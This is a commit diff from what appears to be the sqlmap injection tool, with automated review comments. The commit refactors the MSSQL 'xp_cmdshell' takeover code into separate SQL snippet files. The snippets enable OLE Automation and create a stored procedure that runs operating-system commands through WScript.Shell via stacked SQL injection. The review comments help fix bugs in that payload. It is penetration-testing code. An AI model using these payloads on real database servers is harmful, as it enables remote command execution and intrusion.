

Commit fd4cfb0

committed
working on #51
1 parent 7335072 commit fd4cfb0

3 files changed

Lines changed: 17 additions & 14 deletions


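--- a/lib/takeover/xp_cmdshell.py
+++ b/lib/takeover/xp_cmdshell.py
@@ -41,23 +41,14 @@ def __xpCmdshellCreate(self):
 if Backend.isVersionWithin(("2005", "2008")):
 logger.debug("activating sp_OACreate")
 
-cmd += "EXEC master..sp_configure 'show advanced options',1;"
-cmd += "RECONFIGURE WITH OVERRIDE;"
-cmd += "EXEC master..sp_configure 'ole automation procedures',1;"
-cmd += "RECONFIGURE WITH OVERRIDE"
+cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
 inject.goStacked(agent.runAsDBMSUser(cmd))
 
 self.__randStr = randomStr(lowercase=True)
-self.__xpCmdshellNew = randomStr(lowercase=True)
-self.xpCmdshellStr = "master..xp_%s" % self.__xpCmdshellNew
-
-cmd = "DECLARE @%s nvarchar(999);" % self.__randStr
-cmd += "set @%s='" % self.__randStr
-cmd += "CREATE PROCEDURE xp_%s(@cmd varchar(255)) AS DECLARE @ID int " % self.__xpCmdshellNew
-cmd += "EXEC sp_OACreate ''WScript.Shell'',@ID OUT "
-cmd += "EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1 "
-cmd += "EXEC sp_OADestroy @ID';"
-cmd += "EXEC master..sp_executesql @%s" % self.__randStr
+self.__xpCmdshellNew = "xp_%s" % randomStr(lowercase=True)
+self.xpCmdshellStr = "master..%s" % self.__xpCmdshellNew
+
+cmd = getSPQLSnippet(DBMS.MSSQL, "create_new_xp_cmdshell", RANDSTR=self.__randStr, XP_CMDSHELL_NEW=self.__xpCmdshellNew)
 
 if Backend.isVersionWithin(("2005", "2008")):
 cmd += ";RECONFIGURE WITH OVERRIDE"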
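Review bot: The first added line turns `cmd += "EXEC master..sp_configure ..."` into `cmd = getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")`, so whatever `cmd` held before old line 41 — outside this hunk — is now discarded instead of appended to; if the method initialised it as an empty string this is harmless, otherwise the earlier statements are silently lost, so confirm the initialisation above the hunk. The value of `self.__xpCmdshellNew` now carries the `xp_` prefix that the removed code prepended at each use site, so any other reader of `__xpCmdshellNew` outside this hunk that still writes `"xp_%s"` would double the prefix. The last line appends `;RECONFIGURE WITH OVERRIDE` directly to the snippet text, which assumes `getSPQLSnippet` strips the file's trailing newline(s); that helper is not visible here. `__xpCmdshellCreate` starts before and continues after this hunk.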
Lines changed: 4 additions & 0 deletions
@@ -0,0 +1,4 @@
1+
EXEC master..sp_configure 'show advanced options',1;
2+
RECONFIGURE WITH OVERRIDE;
3+
EXEC master..sp_configure 'ole automation procedures',1;
4+
RECONFIGURE WITH OVERRIDE"
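Review bot: Line 4 of this new snippet ends with a stray double quote, `RECONFIGURE WITH OVERRIDE"`, carried over from the Python literal it replaces (`cmd += "RECONFIGURE WITH OVERRIDE"` in the removed code). SQL Server will treat that `"` as the start of an unterminated quoted identifier (or string, depending on QUOTED_IDENTIFIER), so the stacked batch that enables OLE Automation procedures fails to parse and the later `sp_OACreate` call has nothing to run on. The line should read `RECONFIGURE WITH OVERRIDE`. The file's path is not shown on this page, but by the diff order it is the one `getSPQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")` loads.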
Lines changed: 8 additions & 0 deletions
@@ -0,0 +1,8 @@
1+
DECLARE @%RANDSTR% nvarchar(999);
2+
set @%RANDSTR%='
3+
CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255)) AS DECLARE @ID int
4+
EXEC sp_OACreate ''WScript.Shell'',@ID OUT
5+
EXEC sp_OAMethod @ID,''Run'',Null,@cmd,0,1
6+
EXEC sp_OADestroy @ID';
7+
EXEC master..sp_executesql @%RANDSTR%
8+
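Review bot: The procedure body is now spread over lines 3–6 plus a trailing empty line 8, whereas the removed Python code joined the same fragments with single spaces into one line (`... DECLARE @ID int `, `... @ID OUT `, `... 0,1 `); unless `getSPQLSnippet`, which is not visible here, normalises whitespace, the text handed to `inject.goStacked` now carries raw line breaks. Inside the single-quoted string given to `sp_executesql` that is still valid T-SQL, but line breaks in an injected payload are a change worth confirming against the injection channel. Separately, `CREATE PROCEDURE %XP_CMDSHELL_NEW%(@cmd varchar(255))` appears to cap commands at 255 characters, with longer arguments truncated rather than rejected; that limit is inherited from the old string, but now that it lives in an editable file a comment such as `-- @cmd is limited to 255 chars; longer commands are truncated` would warn the next editor, or the type could be widened.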
